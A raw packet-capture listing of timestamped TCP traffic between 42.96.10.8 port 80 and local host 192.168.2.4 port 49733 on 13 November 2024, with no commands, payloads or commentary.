                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922863007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922864914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922880888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922883034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922900915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922905922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922919989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922944069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922962904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922979116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.922991991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923118114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923269987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923284054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923319101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923332930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923341990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923351049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923369884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923379898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923386097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923402071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923427105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923449993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923464060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923465014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923527956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923640013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923723936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923738956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923757076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923773050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923784018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923800945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923865080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923914909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923916101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923933983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923979044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923994064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.923996925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924042940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924366951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924410105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924427032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924443960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924454927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924525023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924525023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924540997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924570084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924582958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924591064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924609900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924635887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924637079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924654961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924669981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924709082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924715042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924741030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924782038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924797058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.924825907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925051928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925091982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925097942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925107002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925132990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925148010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925149918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925168037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925189972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925230980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925276041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925288916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925295115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925340891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925343037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925358057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925374031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925426960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925457954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925503969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925534964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925560951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925576925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925591946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925622940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925672054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925700903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925736904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925753117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925777912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925858974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925874949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925892115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925901890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925909042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925926924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925946951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925952911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925964117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.925991058 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926008940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926027060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926028013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926054955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926070929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926081896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926086903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926104069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926112890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926121950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.926322937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976129055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976145983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976162910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976201057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976243973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976259947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976273060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976275921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976294041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976304054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976388931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976412058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976428032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976444006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976459026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976474047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976484060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976489067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976505041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976510048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976526976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976538897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976541996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976558924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976572037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.976629019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.007997990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.008028030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.008043051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.008133888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.016752005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.016767979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.016782999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.016809940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.016956091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.017826080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.017841101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.017857075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.017925024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.017940044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.017951012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.017956972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.017985106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.018023014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036767006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036782980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036806107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036823034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036830902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036854982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036870003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036881924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036886930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036901951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036914110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036919117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036927938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036936045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036952019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036964893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.036981106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037019968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037048101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037136078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037153006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037164927 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037168980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037192106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037194014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037219048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037234068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037245035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037250042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037266016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037276983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037308931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037465096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037481070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037532091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037571907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037587881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037615061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037628889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037656069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037668943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037678957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037684917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037695885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037709951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037715912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037731886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037745953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037760973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037770033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037775993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037792921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037801981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037807941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037821054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037823915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037838936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037863016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037863970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037878990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037892103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037906885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037924051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037934065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037947893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037964106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037977934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037977934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.037997961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038012981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038023949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038034916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038039923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038048983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038086891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038113117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038131952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038147926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038156986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038192034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038330078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038388014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038403988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038423061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038429976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038436890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038454056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038460970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038470030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038521051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038549900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038564920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038589954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038604021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038609028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038619995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038647890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038690090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.038996935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039011955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039026976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039060116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039076090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039088964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039094925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039098978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039113045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039128065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039155006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039179087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039196014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039237976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039253950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039279938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039325953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039341927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039356947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039369106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039370060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039387941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039397001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039437056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039448977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039463997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039505005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039520025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039530039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039621115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039670944 CET804973342.96.10.8192.168.2.4
